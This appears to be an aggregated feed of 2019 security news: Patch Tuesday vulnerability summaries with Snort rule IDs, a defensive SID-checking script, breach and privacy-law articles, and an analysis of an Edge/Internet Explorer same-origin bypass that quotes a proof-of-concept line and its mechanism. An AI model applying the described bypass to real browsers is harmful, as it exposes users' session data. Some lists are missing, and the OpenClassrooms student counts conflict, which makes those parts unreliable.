Adobe released a large number of patches today including Flash Player, Acrobat and Reader, Shockwave Player, Dreamweaver, Adobe XD, InDesign, Experience Manager Forms, and Bridge CC. The Flash Player patch covers 1 Critical RCE and 1 Important vuln. Microsoft also ranks the Flash patches as Critical. The Acrobat/Reader patches cover 21 different vulnerabilities, 11 of which are Critical RCE. Adobe Flash and Acrobat/Reader patches should be prioritized for workstation-type systems.



The Laws of Vulnerabilities – Qualys Blog

Microsoft Releases April 2019 Security Updates — Two Flaws Under Active Attack

Microsoft today released its April 2019 software updates to address a total of 74 CVE-listed vulnerabilities in its Windows operating systems and other products, 13 of which are rated Critical and the rest are rated Important in severity. The April 2019 security updates address flaws in Windows OS, Internet Explorer, Edge, MS Office, and MS Office Services and Web Apps, ChakraCore, Exchange Server, .

Microsoft Patch Tuesday — April 2019: Vulnerability disclosures and Snort coverage

Microsoft released its monthly security update today, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 74 vulnerabilities, 16 of which are rated “critical” and 58 that are considered “important.” This release also includes a critical advisory covering a security update to Adobe Flash Player.

This month’s security update covers security issues in a variety of Microsoft’s products, including the Chakra Scripting Engine, Microsoft Office and Windows 10. For more on our coverage of these bugs, check out the Snort blog post here, covering all of the new rules we have for this release.

Critical vulnerabilities

Microsoft disclosed 16 critical vulnerabilities this month, four of which we will highlight below.

CVE-2019-0753 is a remote code execution vulnerability in the Microsoft Scripting Engine that exists in the way the Internet Explorer web browser handles objects in memory. The bug could allow an attacker to corrupt the system in a way that would allow them to gain the same rights as the current user and execute code remotely. In order to trigger this vulnerability, the attacker needs to convince the user to open a specially crafted website in Internet Explorer. They could also embed an ActiveX control marked “safe for initialization” in an application or Microsoft Office document that hosts the Internet Explorer rendering engine.

CVE-2019-0790, CVE-2019-0791, CVE-2019-0792, CVE-2019-0793 and CVE-2019-0795 are all remote code execution vulnerabilities that arise when the Microsoft XML Core Services MSXML parser processes user input. An attacker could exploit any of these bugs to take control of the user’s system. A user could trigger these vulnerabilities by visiting an attacker-created web page that contains malicious MSXML.

The other critical vulnerabilities are:

Important vulnerabilities

This release also contains 58 important vulnerabilities, eight of which we will highlight below.

CVE-2019-0732 is a feature bypass vulnerability in several versions of the Windows operating system that could allow an attacker to bypass Windows Device Guard. This bug exists because Windows improperly handles calls to the LUAFV driver. An attacker could exploit this vulnerability by accessing the local machine and then running a malicious program, giving them the ability to evade a User Mode Code Integrity policy on the machine.

CVE-2019-0752 is a remote code execution vulnerability in the Microsoft Scripting Engine that exists in the way the Internet Explorer web browser handles objects in memory. The bug could allow an attacker to corrupt the system in a way that would allow them to gain the same rights as the current user and execute code remotely. In order to trigger this vulnerability, the attacker needs to convince the user to open a specially crafted website in Internet Explorer. They could also embed an ActiveX control marked “safe for initialization” in an application or Microsoft Office document that hosts the Internet Explorer rendering engine.

CVE-2019-0790 and CVE-2019-0795 are remote code execution vulnerabilities that arise when the Microsoft XML Core Services MSXML parser processes user input. An attacker could exploit any of these bugs to take control of the user’s system. A user could trigger these vulnerabilities by visiting an attacker-created web page that contains malicious MSXML.

CVE-2019-0801 is a remote code execution vulnerability in Microsoft Office that arises when the software attempts to open PowerPoint or Excel files. An attacker could exploit this bug by tricking the user into clicking on a specially crafted URL file that points to an Excel or PowerPoint file, causing the file to download.

CVE-2019-0803 and CVE-2019-0859 are elevation of privilege vulnerabilities in some versions of Windows that exist when the Win32k component improperly handles objects in memory. If exploited, an attacker could gain the ability to run arbitrary code in kernel mode. An attacker could exploit this bug by logging onto the system and then running a specially crafted application.

CVE-2019-0822 is a remote code execution vulnerability that exists in the way Microsoft Graphics Components handles objects in memory. An attacker could exploit this vulnerability by tricking the user into opening a specially crafted file, eventually allowing them to execute arbitrary code in the context of the current user.

The other important vulnerabilities are:

Coverage 

In response to these vulnerability disclosures, Talos is releasing the following SNORTⓇ rules that detect attempts to exploit them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org.

Snort rules: 45632, 45635, 46548, 46549, 49380, 49381, 49688, 49689, 49692 - 49711, 49716 - 49723, 49727 - 49747, 49750 - 49755
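Added example, not code from the Talos post: a small checker that expands the SID list above (ranges included) and reports which of those rules are enabled, disabled (commented out) or absent in a local Snort rules file. The rules file content in the block is constructed sample text with placeholder rule bodies; in practice you would read your deployed snort.rules.

```python
"""Expand the Talos SID list for April 2019 Patch Tuesday and check it against
a Snort rules file. Added example; SAMPLE_RULES is constructed, not real rules."""
import re

# The SID line exactly as published in the Talos post.
TALOS_SID_LINE = ("45632, 45635, 46548, 46549, 49380, 49381, 49688, 49689, "
                  "49692 - 49711, 49716 - 49723, 49727 - 49747, 49750 - 49755")


def expand_sids(text):
    """Turn '1, 2, 5 - 7' into the set {1, 2, 5, 6, 7}; ranges are inclusive."""
    sids = set()
    for item in text.split(","):
        item = item.strip()
        if not item:
            continue
        m = re.fullmatch(r"(\d+)\s*-\s*(\d+)", item)
        if m:
            lo, hi = int(m.group(1)), int(m.group(2))
            if lo > hi:
                raise ValueError(f"inverted range: {item}")
            sids.update(range(lo, hi + 1))
        elif item.isdigit():
            sids.add(int(item))
        else:
            raise ValueError(f"unparseable SID entry: {item!r}")
    return sids


# Matches the sid keyword inside a rule's option block, e.g. "sid:49700;".
_SID_RE = re.compile(r"\bsid\s*:\s*(\d+)\s*;")


def index_rules(rules_text):
    """Map each sid found in a rules file to True (enabled) or False (commented out)."""
    state = {}
    for line in rules_text.splitlines():
        stripped = line.strip()
        m = _SID_RE.search(stripped)
        if not stripped or not m:
            continue  # blank line, plain comment or header: not a rule
        sid = int(m.group(1))
        enabled = not stripped.startswith("#")
        # If the same sid appears twice, an enabled copy wins.
        state[sid] = state.get(sid, False) or enabled
    return state


def coverage_report(sid_text, rules_text):
    """Return (enabled, disabled, missing) sorted SID lists for the SIDs in sid_text."""
    wanted = expand_sids(sid_text)
    state = index_rules(rules_text)
    enabled = sorted(s for s in wanted if state.get(s) is True)
    disabled = sorted(s for s in wanted if state.get(s) is False)
    missing = sorted(s for s in wanted if s not in state)
    return enabled, disabled, missing


# Constructed sample of a deployed rules file: one enabled rule from the list,
# one disabled, one enabled rule inside a range, and one unrelated rule.
SAMPLE_RULES = """\
# --- constructed sample, not a real ruleset ---
alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"placeholder A"; sid:45632; rev:3;)
# alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"placeholder B"; sid:49692; rev:1;)
alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"placeholder C"; sid:49700; rev:1;)
alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"unrelated"; sid:10000; rev:1;)
"""

if __name__ == "__main__":
    en, dis, miss = coverage_report(TALOS_SID_LINE, SAMPLE_RULES)
    print(f"Talos lists {len(expand_sids(TALOS_SID_LINE))} SIDs")
    print("enabled :", en)
    print("disabled:", dis)
    print("missing :", len(miss), "SIDs, e.g.", miss[:5])
```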

Zingbox now part of the Microsoft Active Protections Program

Zingbox, provider of the most widely deployed Internet of Things (IoT) security and analytics platform, is now part of the Microsoft Active Protections Program (MAPP). Participation in MAPP is an important part of Zingbox’s continuing efforts to provide real-time proactive security for IoT devices. MAPP is a program through which security vendors identify vulnerabilities in Microsoft software, pooling research to enhance the overall security of devices leveraging Microsoft software. The program is an arm of … More

The post Zingbox now part of the Microsoft Active Protections Program appeared first on Help Net Security.

UK Investigates Microsoft, Sony, Nintendo Over Game Subscription Plans

An anonymous reader quotes Variety: The United Kingdom's Competition and Markets Authority (CMA) is launching a consumer law investigation into video game companies Microsoft, Sony, and Nintendo over some of their business practices, it announced on Friday. The CMA is concerned about whether or not some of the companies' practices are legal, including their use of auto-renewals for subscription services like Xbox Live, PlayStation Plus, and Nintendo Switch Online. It's also looking into their cancellation and refund policies and their terms and conditions. It said it's written to Nintendo, Sony, and Microsoft requesting information on their online gaming contracts and it's calling on people who use these services to tell the CMA about their experiences.

Read more of this story at Slashdot.

Microsoft and OpenClassrooms team up to prepare students for AI jobs

Microsoft collaborates with OpenClassrooms to recruit and train 10,000 students for AI-learning program

Redmond giant Microsoft on Wednesday announced its partnership with OpenClassrooms, a leading France-based online education-to-employment platform, to train and prepare students for artificial intelligence (AI) jobs in the workplace.

“As AI is changing the way we work and the nature of jobs, we have a responsibility to ensure graduates are prepared for the workplace of tomorrow,” says Jean-Philippe Courtois, Executive Vice President and President, Global Sales, Marketing and Operations at Microsoft. “We are excited to partner with OpenClassrooms to help equip people with the skills and opportunities they need to thrive in the digital economy.”

According to an estimate cited by Microsoft, as many as 30% of AI and data-skills jobs will be left open due to a shortage of AI talent. With demand for AI skills exceeding supply, the new program aims to prepare skilled labor and give employers access to highly talented candidates.

“The collaboration is designed to provide more students with access to education to learn in-demand skills and to qualify for high-tech jobs, while giving employers access to great talent to fill high-tech roles,” Microsoft said in the announcement blog post.

OpenClassrooms will construct the masters-level online program based on Microsoft’s content and project-specific tasks tailored to the AI roles that employers are looking to fill. This is a fully online program that is designed to produce high-quality graduates. This model aids students and employers, who gain a cost-efficient pipeline for recruiting new talent.

“The demand for AI and machine learning opportunities has never been stronger,” says OpenClassrooms co-founder and CEO Pierre Dubuc. “We’re excited to be an innovation partner to Microsoft to usher in new tactics that will bring top talent to the workforce.”

OpenClassrooms will be recruiting 1,000 promising candidates throughout France, the U.K., and the U.S. for this program. Students who manage to complete the program have been guaranteed a job within six months or they will receive a full refund from OpenClassrooms. They will also earn a masters-level diploma accredited in Europe through OpenClassrooms. The company is actively looking for accreditation in the UK and U.S.

Source: Microsoft

The post Microsoft and OpenClassrooms team up to prepare students for AI jobs appeared first on TechWorm.

Microsoft’s Windows 10 May 2019 Update to give users better control over updates

Microsoft gives control of feature updates back to users with Windows 10 May 2019 Update

Microsoft has confirmed that its next feature update named ‘May 2019 update’ will bring “significant changes” to the Windows update process.

“We are excited to announce significant changes in the Windows update process, changes designed to improve the experience, put the user in more control, and improve the quality of Windows updates,” Microsoft corporate vice president Mike Fortin announced in the blog post. “We have heard clear feedback that the Windows update process itself can be disruptive, particularly that Windows users would like more control over when updates happen.”

The previous Windows 10 feature update rollouts were automatically installed on Windows 10 devices. With the Windows 10 May 2019 Update, users will be more in control of initiating the feature OS update and will be empowered with control and transparency around when updates are installed.

“We will provide a notification that an update is available and recommended based on our data, but it will be largely up to the user to initiate when the update occurs. In fact, all customers will now have the ability to explicitly choose if they want to update their device when they ‘check for updates’ or to pause updates for up to 35 days,” Fortin added.

While Windows 10 will no longer forcefully restart itself, if the updates are critical, or the installed version is reaching the end of service, they will still take place automatically, Fortin said.

The Windows 10 May 2019 Update will give users control over the update experience, both for feature updates and optional monthly non-security updates. There is a new “Download and install now” option in Windows Update settings that allows users to choose to download and install updates, pause updates that would land at inconvenient times, and set intelligent active hours to avoid disruptive update restarts.

“We are taking further steps to be confident in the quality of the May 2019 Update. We will increase the amount of time that the May 2019 Update spends in the Release Preview phase, and we will work closely with ecosystem partners during this phase to proactively obtain more early feedback about this release. This will give us additional signals to detect issues before broader deployment. We are also continuing to make significant new investments in machine learning (ML) technology to both detect high-impact issues efficiently at scale and further evolve how we intelligently select devices that will have a smooth update experience,” Fortin writes.

The May 2019 update will be available in the Release Preview ring of the Windows Insider Program next week. Further, Windows 10 May 2019 Update is expected to start rolling out for free to compatible devices in late May 2019.

The post Microsoft’s Windows 10 May 2019 Update to give users better control over updates appeared first on TechWorm.

April Patch Tuesday Forecast: Be aware of end-of-service issues and browser exploits

April Patch Tuesday is nearly here with two significant topics of concern. The first relates to end-of-service milestones and the second issue is browser exploits. Let’s start with end-of-service. This is a fitting topic this month given we have two Windows 10 versions that are hitting end of service milestones in April, but I do want to expand the conversation beyond Windows 10 to discuss Windows 7, Server 2008 and 2008 R2, Flash Player, Java … More

The post April Patch Tuesday Forecast: Be aware of end-of-service issues and browser exploits appeared first on Help Net Security.

Microsoft and Canonical Launch Visual Studio Code Snap For Linux

Following the release of Visual Studio 2019 for Windows and Mac platforms, Microsoft today is releasing a snap version of Visual Studio Code. A report adds: No, the source-code editor is not the Windows-maker's first snap -- it also released one for Skype, for instance. "As of today, Visual Studio Code is available for Linux as a snap, providing seamless auto-updates for its users. Visual Studio Code, a free, lightweight code editor, has redefined editors for building modern web and cloud applications, with built-in support for debugging, task running, and version control for a variety of languages and frameworks," says Canonical. Joao Moreno, Software Development Engineer, Microsoft Visual Studio Code offers the following statement: "The automatic update functionality of snaps is a major benefit. It is clear there is a thriving community around snaps and that it is moving forward at great pace. The backing of Canonical ensures our confidence in its ongoing development and long-term future."

Read more of this story at Slashdot.

The End of the Desktop?

Steven J. Vaughan-Nichols, writing for ComputerWorld : Of course, at one time, to get any work done with a computer, you first had to learn a lot, about computers, operating systems, commands and more. Eventually, "friendly" became the most important adverb in computing circles, and we've reached the point in user-friendliness that people don't even talk about it anymore. Today, Google has shown with its Chrome OS that most of us can pretty much do anything we need to do on a computer with just a web browser. But Google's path is not Microsoft's path. Instead, it's moving us first to Windows as desktop as a service (DaaS) via Microsoft Managed Desktop (MMD). This bundles Windows 10 Enterprise, Office 365 and Enterprise Mobility + Security and cloud-based system management into Microsoft 365 Enterprise. The next step, Windows Virtual Desktop, enables companies to virtualize Windows 7 and 10, Office 365 ProPlus apps and other third-party applications on Azure-based virtual machines. If all goes well, you'll be able to subscribe to Windows Virtual Desktop this fall. Of course, Virtual Desktop is a play for business users -- for now. I expect Virtual Desktop to be offered to consumers in 2020. By 2025, Windows as an actual desktop operating system will be a niche product. Sound crazy? Uh, you do know that Microsoft already really, really wants you to "rent" Office 365 rather than buy Office 2019, don't you? But what about games, you say? We'll always have Windows for games! Will we? Google, with its Google Stadia gaming cloud service, is betting we're ready to move our games to the cloud as well. It's no pipe dream. Valve has been doing pretty well for years now with its Steam variation on this theme. So where is all this taking us? I see a world where the PC desktop disappears for all but a few. 
Most of us will be writing our documents, filling out our spreadsheets and doing whatever else we now do on our PCs via cloud-based applications on smart terminals running Chrome OS or Windows Lite. If you want a "real" PC, your choices are going to be Linux or macOS.

Read more of this story at Slashdot.

Microsoft Bounty Program Offers Larger Rewards For Bug Hunters

Microsoft, which already offers one of the biggest bug bounty programs, said today it is increasing the payouts it makes and the time it takes to push the payments. From a report: A key change in policy is that Microsoft will no longer wait until a fix has been produced for a bug until making a payout -- now the only requirement is that a bug can be reproduced. This is thanks in part to a partnership with HackerOne. [...] The maximum bounty has increased from $15,000 to $50,000 for the Windows Insider Preview bounty and from $15K to $20K for the Microsoft Cloud Bounty.

Read more of this story at Slashdot.

Microsoft rolls out new security capabilities for Azure customers

Microsoft has announced new security features for customers of its Azure cloud computing service. They are a mix of features for storage and compute services:
  • Advanced Threat Protection for Azure Storage
  • A regulatory compliance dashboard in Azure Security Center
  • Security assessments, recommendations and disk encryption for Virtual Machine Scale Sets
  • Azure Dedicated Hardware Security Module (HSM) service availability in more regions.

Azure ATP and the regulatory compliance dashboard

Advanced Threat Protection, which detects unusual and … More

The post Microsoft rolls out new security capabilities for Azure customers appeared first on Help Net Security.

IT Security Expert Blog: Cyber Security Roundup for March 2019

The potential threat posed by Huawei to the UK national infrastructure continues to be played out. GCHQ called for a ban on Huawei technology within UK critical networks, such as 5G networks, while Three said a Huawei ban would delay the UK 5G rollout, and the EU ignored the US calls to ban Huawei in 5G rollouts, while promoting the EU Cybersecurity certification scheme to counter the Chinese IT threat, which is all rather confusing.  Meanwhile, Microsoft Researchers found an NSA-style Backdoor in Huawei Laptops, which was reported to Huawei by Microsoft, leading to the flaw being patched in January 2019.
A serious security flaw placed Royal Bank of Scotland (RBS) customers at risk. The vulnerability was discovered by PenTest Partners in the bank-provided 'Heimdal Thor' security software, which was meant to protect NatWest customers from cyber-attacks but actually permitted remote command injection at the customer's endpoint. PenTest Partners said "We were able to gain access to a victim's computer very easily. Attackers could have had complete control of that person's emails, internet history and bank details. To do this we had to intercept the user's internet traffic but that is quite simple to do when you consider the unsecured public wi-fi out there, and it's often all too easy to compromise home wi-fi setups."
 
Facebook made negative security headlines yet again after it disclosed that 20,000 of its employees had access to hundreds of millions of user account passwords for years.

One of the world’s biggest aluminium producers, Norsk Hydro, suffered production outages after a ransomware outbreak impacted its European and US operations. Damages from the ransomware attack on Norsk Hydro reached as high as $40M.

Citrix disclosed that a security breach of its internal network may have compromised 6Tb of sensitive data. The FBI had told Citrix that international cyber criminals had likely gained access to its internal network. Citrix said in a statement it had taken action to contain the breach: “We commenced a forensic investigation; engaged a leading cyber security firm to assist; took actions to secure our internal network; and continue to cooperate with the FBI”. According to security firm Resecurity, the attacks were perpetrated by an Iranian-linked group known as IRIDIUM.

Credit monitoring firm Equifax admitted in a report that it didn't follow its own patching schedule, neglecting to patch Apache Struts, which led to the major 2017 breach that impacted 145 million people. The report also said Equifax delayed alerting its customers for 6 weeks after detecting the breach.

ASUS computers had backdoors added through its software update system, in an attack coined “ShadowHammer”. Kaspersky researchers estimated malware was distributed to nearly a million people, although the cybercriminals appeared to have only targeted 600 specific devices. Asus patched the vulnerability but questions still remain.


The top 10 biggest breaches of 2018 according to 4iQ were:
  1. Anti-Public Combo Collections – (Hacked) Sanixer Collection #1-6, 1.8 billion unique email addresses.
  2. Aadhaar, India – (Open third party device) 1.1 billion people affected
  3. Marriott Starwood Hotels – (Hacked) 500 million guests PII
  4. Exactis – (Open device) 340 million people and businesses.
  5. HuaZhu Group – (Accidental Exposure) 240 million records
  6. Apollo – (Open device) 150 million app users.
  7. Quora – (Hacked) 100 million users.
  8. Google+ – (API Glitch) 52.2 million users.
  9. Chegg – (Hacked) 40 million accounts 
  10. Cathay Pacific Airways (Targeted attack) 9.4 million passengers.
Barracuda Networks reported the top 12 phishing email subject lines, after they analysed 360,000 phishing emails over a three-month period.

Microsoft Partners With OpenClassrooms To Recruit and Train 1,000 AI Students

Microsoft is partnering with French online education platform OpenClassrooms to train and recruit promising students in AI and prepare them for the workplace. From a report: OpenClassrooms is one of a number of massive open online course (MOOC) platforms, offering an unlimited number of people access to courses ranging from programming and project management to product design. The company has raised north of $60 million since its inception in 2007, including a $60 million series B round last May. Through its latest partnership, OpenClassrooms will construct programs based on Microsoft's content and project-specific tasks -- these are designed to fill the types of AI roles that are in demand. Though it's reasonable to assume Microsoft is a potential suitor for future graduates, the scope of the program is broader than that -- those who complete the master's-level course will be given access to a range of employers with AI positions to fill.

Read more of this story at Slashdot.

Microsoft Stops Selling eBooks, Will Refund Customers For Previous Purchases

Starting today, Microsoft is ending all ebook sales in its Microsoft Store for Windows PCs. "Previously purchased ebooks will be removed from users' libraries in early July," reports The Verge. "Even free ones will be deleted. The company will offer full refunds to users for any books they've purchased or preordered." From the report: Microsoft's "official reason," according to ZDNet, is that this move is part of a strategy to help streamline the focus of the Microsoft Store. It seems that the company no longer has an interest in trying to compete with Amazon, Apple Books, and Google Play Books. It's a bit hard to imagine why anyone would go with Microsoft over those options anyway. If you have purchased ebooks from Microsoft, you can continue accessing them through the Edge browser until everything vanishes in July. After that, customers can expect to automatically receive a refund. According to a newly published Microsoft Store FAQ, "refund processing for eligible customers start rolling out automatically in early July 2019 to your original payment method." If your original payment method is no longer valid (or if you used a gift card), you'll receive a credit back to your Microsoft account to use online at the Microsoft Store. Microsoft will also offer an additional $25 credit (to your Microsoft account) if you annotated or marked up any ebook that you purchased from the Microsoft Store prior to today, April 2nd. Liliputing reminds us that "if you pay for eBooks, music, movies, video games, or any other content from a store that uses DRM, then you aren't really buying those digital items so much as paying a license fee for the rights to access them... a right that can be revoked if the company decides to remove a title from your device unexpectedly or if a company shuts down a server that would normally handle the digital rights management features." 
You can find DRM-free eBooks at some online stores including Smashwords and Kobo (by browsing the DRM-free selection), or from publisher websites including Angry Robot, and Baen.

Read more of this story at Slashdot.

Microsoft Launches Visual Studio 2019 For Windows and Mac

An anonymous reader writes: Microsoft today announced that Visual Studio 2019 for Windows and Mac has hit general availability — you can download it now from visualstudio.microsoft.com/downloads. Visual Studio 2019 includes AI-assisted code completion with Visual Studio IntelliCode. Separately, real-time collaboration tool Visual Studio Live Share has also hit general availability, and is now included with Visual Studio 2019.

Read more of this story at Slashdot.

The global data privacy roadmap: a question of risk

For most American businesses, complying with US data privacy laws follows a somewhat linear, albeit lengthy, path. Set up a privacy policy, don’t lie to the consumer, and check the specific rules if you’re a health care provider, video streaming company, or kids’ app maker.

For American businesses that want to expand to a new market, though, complying with global data privacy laws is more akin to finding dozens of forks in the road, each one marked with an indecipherable signpost.

Should a company expand to China? That depends on whether the company wants to have its source code potentially analyzed by the Chinese government. Okay, what about South Korea? Well, is the company ready to pay three percent of its revenue for a wrongful data transfer, or to have one of its executives spend time behind bars?

Europe is an obvious market to capture, right? That’s true, but, depending on which country, the local data protection authorities could issue enormous fines for violating the General Data Protection Regulation.

What if a company just follows in the footsteps of the more established firms, like Google, Amazon, or Microsoft, which all opened data centers in Singapore in the past two years? Once again, the answer depends on the company. If it’s providing a service that Singapore considers “essential,” it will have to heed a new cybersecurity law there.

At this point, a company might think about entering a country with no data privacy laws. No laws, no getting in trouble, right? Wrong. Data privacy laws can sprout up seemingly overnight, and future compliance costs could severely cut into a company’s budget.

While this may appear overcomplicated, one guiding principle helps: If a company cannot afford to comply with a country’s data privacy laws, it probably should not expand to that country. The risk, which could be millions in penalties, might not outweigh the reward.

Today, for the third piece in our data privacy and cybersecurity blog series, which also took a look at current US data privacy laws and federal legislation on the floor, we explore the decision-making process of a mid-market-sized company that wants to expand its business outside the United States.

With the help of Reed Smith LLP counsel Xiaoyan Zhang, we looked at several notable data privacy laws in Europe, Asia, Latin America, the Middle East, and Africa.

Issue-spotting within a culturally-crafted landscape

Before a company expands into a new country, it should try to truly comprehend the data privacy laws located within, Zhang said. She said this involves more than just reading the law; it requires training one’s thinking into an entirely different culture.

Unlike crimes including manslaughter and robbery—which have near-universal definitions—Zhang said data privacy violations fluctuate from region to region, with interpretations rooted in a country’s history, economy, public awareness, and opinions on privacy.

“Data privacy is not like murder, which is much more straightforward,” Zhang said. “Privacy law is very intimately tied into culture.”

So, while overseas concepts might appear familiar— like protecting “personally identifiable information” in the US and protecting “personal information” in the European Union—the culture behind those concepts varies.

For example, in the European Union, a history of fierce antitrust regulation and government enforcement helped usher GDPR’s passage. In fact, Austrian online privacy advocate Max Schrems—whose legal complaints against Facebook heavily influenced the final text of GDPR—remarked years ago that he was surprised at the lack of tall garden hedges around Americans’ homes. The country’s understanding of privacy, Schrems realized, was different than that of Austria, and so, too, are its data privacy laws.

Similarly, Zhang said she has fielded many questions from EU lawyers who assume that data privacy regulations around the world are similar to those in GDPR.

“EU lawyers are used to thinking that, for every data collection, there must be a legitimate purpose, and they insist on asking the same questions,” Zhang said. “When I’m talking about legal advice in China, they’ll say ‘Oh, our medical device needs to collect data from users, does China have any law or statutes that give us a legitimate business purpose to collect that data?’”

Zhang continued: “No. In China, you don’t need that. It’s totally different.”

The differences can be managed with the right help, though.

The safest path for market expansion is to rely on a global data privacy lawyer to “issue-spot” any obvious global compliance issues, Zhang said. These experts will look at what type of data a company handles—including medical, financial, geolocation, biometric, and others—what type of service the company performs, and whether the company will need to perform frequent cross-border data transfers. Depending on all these factors, each company’s individual roadmap for data privacy compliance will be unique.

However, Zhang led us on a bit of a world tour, detailing some of the notable data privacy laws in Europe, Asia, Africa, the Middle East, and Latin America. Company expansion into these markets, Zhang emphasized, depends on whether a company is ready for compliance.

Many countries, many laws

Europe

Starting with Europe there is, of course, GDPR. Complying with the sweeping set of provisions is tricky because GDPR gives each EU member-state the authority to enforce the new data protection law on its own turf.

This enforcement is done through Data Protection Authorities (DPAs), which oversee, investigate, and issue fines for GDPR violation. Each member-state has its own DPA, and, in the months before GDPR’s implementation, the DPAs gave mixed signals about what local enforcement would look like.

France’s DPA, the National Data Protection Commission (CNIL), said that companies that are at least trying to comply with GDPR “can expect to be treated leniently initially, provided that they have acted in good faith.”

Less than one year later, though, that leniency met its limit. CNIL hit Google with the largest GDPR-violation fine on record, at roughly $57 million.

The best defense to these penalties, Zhang said, is to consult with local legal experts who know the region’s enforcement history and details.

“You cannot just seek consultation from a GDPR expert. If you want to go specifically to Germany, you need German lawyers who can offer insight on things that are specific to Germany,” Zhang said. “That’s for all of Europe.”

Latin America

Outside of Europe—but still inspired by GDPR—is Latin America. Zhang said several Latin American countries have enacted, or are considering, legislation that protects the data privacy rights of individuals.

In 2018, Brazil passed its comprehensive data protection law, which protects people’s personal information and includes tighter protections for sensitive information that discloses race, ethnicity, religion, political affiliation, and biometrics. Argentina also forwarded privacy protections for its citizens, and it earned a special clearance in GDPR as a “whitelisted” party, meaning that personal data can be moved to Argentina from the EU without extra safeguards.

Asia

Moving to China, a whole new risk factor comes into play—surveillance.

China’s cybersecurity law grants the Chinese government broad, invasive powers to spy on Internet-related businesses that operate within the country. Implemented in 2017, the law allows China’s foreign intelligence agency to perform “national security reviews” on technology that foreign companies want to sell or offer in China.

This authority raised alarm bells for the researchers at Recorded Future, who attributed past cyberattacks directly to the Chinese government. Researchers said the law could give the Chinese government the power to both find and exploit zero-day vulnerabilities in foreign companies’ products, all for the price of admission into the Chinese market.

“China’s law has a hidden angle for government control and monitoring,” Zhang said. “It has a different rationale.”

Outside of China, Singapore has garnered the attention of Google, Microsoft, and Amazon, which all built data centers in the country in the past few years. The country passed its Personal Data Protection Act in 2012 and its Cybersecurity Act in 2018, the latter of which sets up a framework for monitoring cybersecurity threats in the country.

The law has a narrow scope, as it only applies to companies and organizations that control what the Singaporean government calls “critical information infrastructure,” or CII. This includes computer systems that manage banking, government, healthcare, and aviation services, among others. The law also includes data breach notification requirements.

Moving to South Korea, the risk for organizations goes up dramatically, Zhang said. The country’s Personal Information Protection Act preserves the privacy rights of its citizens, and its penalties include criminal and regulatory fines, and even jail time. Cross-border data transfers, in particular, are strictly guarded. One wrongful transfer can result in a fine of up to three percent of a company’s revenue.

Africa

Traveling once again, expansion into Africa requires an understanding of the continent’s burgeoning, or sometimes non-existent, data privacy laws. Zhang said that, of Africa’s more than 50 countries, only about 15 have data protection laws, and even fewer have the regulators necessary to enforce those laws.

“Among [the countries], nine have no regulators to enforce the law, and five have a symbolic law but it’s not enforced,” Zhang said.

So, that invites the question: What exactly does happen if a company expands into a country that doesn’t have any data privacy laws?

What happens is potentially more risk.

First, a country could actually develop and pass a data privacy law within years of a company’s expansion into its borders. It’s not unheard of—less than one year after Amazon announced its rollout into Bahrain, the country introduced its first comprehensive data privacy law. Second, compliance with the new data privacy law could be expensive, Zhang said, forcing a company into a tough situation where it might have to withdraw entirely from the new market.

“One common misconception is that if a country doesn’t have a law at all, it’s a good country to go to,” Zhang said. “You should think twice about whether that’s the case.”

Expand or not? It’s up to each company

There is no single roadmap for companies entering new markets outside the United States. Instead, there are multiple paths a company can take depending on its product, services, the data it collects, data it will need to move between borders, and its tolerance for risk.

The safest path, Zhang said, is to ask questions upfront. It is far better to make an informed decision about how to enter a market—even if compliance is costly—than to be surprised with fines or penalties later on.

The post The global data privacy roadmap: a question of risk appeared first on Malwarebytes Labs.

TrendLabs Security Intelligence Blog: Microsoft Edge and Internet Explorer Zero-Days Allow Access to Confidential Session Data

by Kassiane Westell

On March 30th, security researcher James Lee disclosed information on two zero-day vulnerabilities present in current versions of Microsoft Edge and Internet Explorer. These vulnerabilities make it possible for confidential information to be shared between websites.

A flaw in the same-origin policy for these web browsers, called an Origin Validation Error (CWE-346), allows JavaScript embedded in a malicious web page to gather information about other web pages the user has visited. If a user visits a malicious page via a Microsoft Edge or Internet Explorer web browser, these vulnerabilities may be used to relay sensitive information about the client’s browser session back to an attacker. Lee has shared a simple proof-of-concept (POC) for each vulnerability.

How same-origin policies work

To illustrate the same-origin policy, visualize a scenario where an attacker wishes to gain access to a client’s banking information. The attacker tricks the user into visiting the site “hxxp://www.attack1.com,” which has JavaScript embedded in a malicious webpage that can supposedly access all the session IDs currently stored in the client’s cache. In particular, this maneuver attempts to expose an online banking session a user is running with “hxxp://www.trustedbank.com”.

A same-origin policy within the client’s browser should prevent the script on “attack1.com” from accessing information from “trustedbank.com” because the bank and the attacker’s webpage have different origins. Thus, the client’s banking information is not exposed to the attacker, and the client remains safe.

Analysis of the attack

Unfortunately, in the case of these vulnerabilities, an attacker can bypass the same-origin policy in Microsoft Edge and Internet Explorer.

Accessing a crafted website with the malicious script provided via a vulnerable browser (Internet Explorer in this case) yields the following result:

Figure 1. Pop-up caused by POC being accessed by client through Internet Explorer.

In this case, a proof-of-concept webpage hosted on “pwning.click” redirects to the search engine “bing.com.” If the same-origin policy in Internet Explorer — the browser being used by the client — were working properly, then the embedded JavaScript would only display information from pwning.click. Shockingly, the pop-up displays information from the search results of bing.com.

The browser is not restricting information about the website redirection properly, and instead allows pwning.click to access information about the client’s activities on other websites. In a malicious attack scenario, the attacker could also receive the information directly. There would be no pop-up and the user would be unaware of any compromise.

The images below show the traffic captures of the POC being accessed by Internet Explorer and Microsoft Edge:

Figure 2. Traffic capture of POC accessed using Internet Explorer, which James Lee made public.

Figure 3. Traffic capture of POC accessed using Microsoft Edge, which James Lee made public.

The line performance.getEntries("resource")[index].name is the important part of this POC. This line in the embedded JavaScript accesses the name of the resolved URL of the requested resource through JavaScript’s Performance API.

Performance.getEntries(<entryType>) will return a list of PerformanceEntry objects with the attributes seen below in Figure 4. An updated list of valid entryTypes can be found here.

Figure 4. List of PerformanceEntry object fields found here

Note that performance.getEntriesByType("resource")[index].name is simply performance.getEntries for Internet Explorer; thus the technical explanation is essentially the same.

The URL in the popup in Figure 1 is not equivalent to the embedded origin, which shows that the attacker has successfully bypassed the same-origin policy in the browser and accessed a resource that should have been restricted.
